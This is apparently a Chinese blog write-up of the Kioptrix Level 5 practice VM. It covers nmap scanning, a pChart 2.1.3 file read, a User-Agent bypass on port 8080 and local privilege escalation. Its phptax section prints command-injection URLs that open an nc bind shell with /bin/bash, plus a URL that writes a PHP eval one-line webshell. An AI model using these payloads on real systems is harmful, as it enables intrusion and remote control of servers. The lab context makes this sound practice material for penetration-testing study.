类OCSP靶场-Kioptrix系列-Kioptrix Level 5(2014)

一、前情提要

二、实战打靶

1. 信息收集

1.1. 主机发现

1.2. 端口扫描

1.3.目录遍历

1.4. 敏感信息

2.漏洞发现

2.1. 任意文件访问

2.2. web服务8080端口访问限制绕过

2.3. 远程命令执行

2.4. webshell进行getshell

2.5. 提权


一、前情提要

kali黑客-利用searchsploit搜索exp一键化攻击-CSDN博客

一篇文章带你理解nmap的使用-nmap使用手册-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 1-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 2-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 3-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 4-CSDN博客

类OCSP靶场-Kioptrix系列-Kioptrix Level 5-CSDN博客


二、实战打靶

这个靶机练习,相当于内网渗透。

1. 信息收集

1.1. 主机发现

在同一局域网下的主机发现思路:

  • 通过ifconfig或ip add的方式查看当前主机的网段

  • 利用nmap对扫描对应子网内的所有主机在线情况

执行完命令可以发现,该网段除了我们的kali还有一台主机在线。

(PS:在虚拟网络下1和2这两个ip分别对应的是网卡和网关。)


1.2. 端口扫描

还是利用nmap进行端口扫描并探测端口服务的版本。

  • 命令:nmap -sT -sV - -O --min-rate 10000 -p- 192.168.xxx.xxx

    • -sT:以TCP三次握手的形式进行扫描

    • -sV:扫描各服务的版本

    • -O:扫描目标机器的操作系统

    • --min-rate:最少的发包数量

    • -p-:全端口扫描


1.3.目录遍历

啥也没爆破出来


1.4. 敏感信息

这个是根据端口探测、手工、目录爆破信息收集来的。

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:B6:28:51 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (94%), OpenBSD 4.X (88%), VMware ESXi 5.X (86%)
OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:openbsd:openbsd:4.0 cpe:/o:vmware:esxi:5.0 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: FreeBSD 9.0-RELEASE - 10.3-RELEASE (94%), FreeBSD 7.0-RELEASE - 9.0-RELEASE (89%), OpenBSD 4.0 (88%), FreeBSD 9.3-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), VMware ESXi 5.0 (86%)
​
​
80端口存在pChart2.1.3/index.php目录文件


2.漏洞发现

2.1. 任意文件访问

searchsploit "pChart 2.1.3"
#搜索根据敏感信息搜索框架漏洞

31173是个任意文件访问

 

这是个FreeBSD系统,FreeBSD系统中Apache的默认安装目录通常是/usr/local/www/apache2x,这是FreeBSD Ports系统中Apache HTTP Server的标准安装位置。如果你是通过ports安装的Apache,那么配置文件通常位于/usr/local/etc/apache2x目录下。 以下是一些常见的Apache目录和文件路径: 二进制文件: /usr/local/www/apache2x/bin/httpd 配置文件: /usr/local/etc/apache2x/httpd.conf 日志文件: /usr/local/var/log/apache2x 模块文件: /usr/local/www/apache2x/modules ​ apache2x里面的x是不确定数字,但都是个位的一个一个试 在这个版本的FreeBSD系统,x是2,里面的apache2x全部替换成apache22

根据上面信息,我们查询一下它的配置文件,但是光这个任意文件访问是无法getshell的,因为权限过低一些可远程连接的文件无法访问读取。


2.2. web服务8080端口访问限制绕过

手工访问,发现无论输入什么目录都限制无权限访问。

利用前面的任意文件访问,从配置文件中查询8080端口的访问要求。找到了User-Agent必须带上Mozilla/4.0

我们用HackBar来实现访问的时候User-Agent带上Mozilla/4.0,发现存在新的页面


2.3. 远程命令执行

测试过后发现该页面都是一个PDF文件作用不大

继续信息收集,根据目录搜索发现了远程执行的exp不过是txt文件。

查看文件内容发现poc,里面存在nc和bash判断为远程命令执行的poc。

http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
​
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

直接执行失败了,并且该RCE无回显。

利用echo命令讲结果写入txt文本中查看,验证命令执行漏洞存在。


2.4. webshell进行getshell

经过测试好几个的反弹shell都失败了,考虑可以写文件,尝试写一个一句话木马进去上线,上线成功。

http://192.168.150.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php eval($_POST[123]) ?>' > shell.php;&pdf=make

记得填写User-Agent,如果是本机上需要关闭杀毒软件,不然连接不成功。


2.5. 提权

反弹shell后进行内网信息收集

这个操作系统内核版本存在本地权限提升

发现无法下载

通过webshell管理器将,文件进行上传

提权成功


http://www.niftyadmin.cn/n/5797198.html

相关文章

Vue3之状态管理Vuex

Vuex作为Vue.js的官方状态管理库&#xff0c;在大型或复杂的前端项目中扮演着至关重要的角色。本文将从Vuex的原理、特点、应用场景等多个方面进行深入解析&#xff0c;并通过代码示例展示如何在Vuex中实现特定功能。 一、Vuex原理 Vuex是一个专为Vue.js应用程序开发的状态管…

【Java基础面试题027】Java的StringBuilder是怎么实现的?

回答重点 StringBuilder主要是为了解决String对象的不可变性问题&#xff0c;还有单线程环境下StringBuffer的性能问题。提供了高效动态的字符串拼接和修改操作。大致需要实现append、insert等功能 大致核心实现如下&#xff1a; 内部使用字符数组&#xff08;char[] value&…

基于python+django的旅游信息网站-旅游景点门票管理系统

标题:基于 PythonDjango 的旅游信息网站-旅游景点门票管理系统 内容:1.摘要 基于 PythonDjango 的旅游信息网站-旅游景点门票管理系统的摘要&#xff1a; 随着旅游业的快速发展&#xff0c;旅游景点门票管理系统的重要性日益凸显。本文旨在设计并实现一个基于 PythonDjango 的…

基于SpringBoot滑雪场管理系统的设计与实现(文末附源码)

博主介绍&#xff1a;✌全网粉丝50W,csdn特邀作者、博客专家、CSDN新星计划导师、Java领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和学生毕业项目实战,高校老师/讲师/同行前辈交流✌ 技术范围&#xff1a;SpringBoot、Vue、SSM、HLM…

以太网 Ethernet 报文解析

以太网 Ethernet 报文解析 使用canoe 发送报文。解析这个报文 参考资料 IPv4报文协议 链接: https://blog.csdn.net/m0_61643743/article/details/128509490 UDP 报文协议 链接: https://blog.csdn.net/weixin_43142797/article/details/105648071 https://fasionchan.com/ne…

《计算机组成及汇编语言原理》阅读笔记:p28-p47

《计算机组成及汇编语言原理》学习第 3 天&#xff0c;p28-p47 总结&#xff0c;总计 20 页。 一、技术总结 1.Virtual Machine 2.stack 3.The fetch-execute Cycle 在控制单元(Control Unit, CU)里面有一个指令寄存器(Instruction Register, IR)和一个程序计数器(Program…

探索数据可视化的利器:Matplotlib

探索数据可视化的利器&#xff1a;Matplotlib 引言 在数据科学和机器学习领域中&#xff0c;有效的数据可视化是理解和传达信息的关键。Python拥有许多优秀的可视化库&#xff0c;其中Matplotlib是最基础也是最强大的之一。它不仅为其他高级可视化库&#xff08;如Seaborn、P…

JUC并发工具---并发容器

HashMap为什么是线程不安全的 import java.util.HashMap; /*** 由于 HashMap 的线程不安全性&#xff0c;最终的 HashMap 值可能不符合预期。* 例如&#xff0c;预期值应该是 0&#xff08;因为增加和减少操作相互抵消&#xff09;&#xff0c;但实际上可能得到一个不同的值。…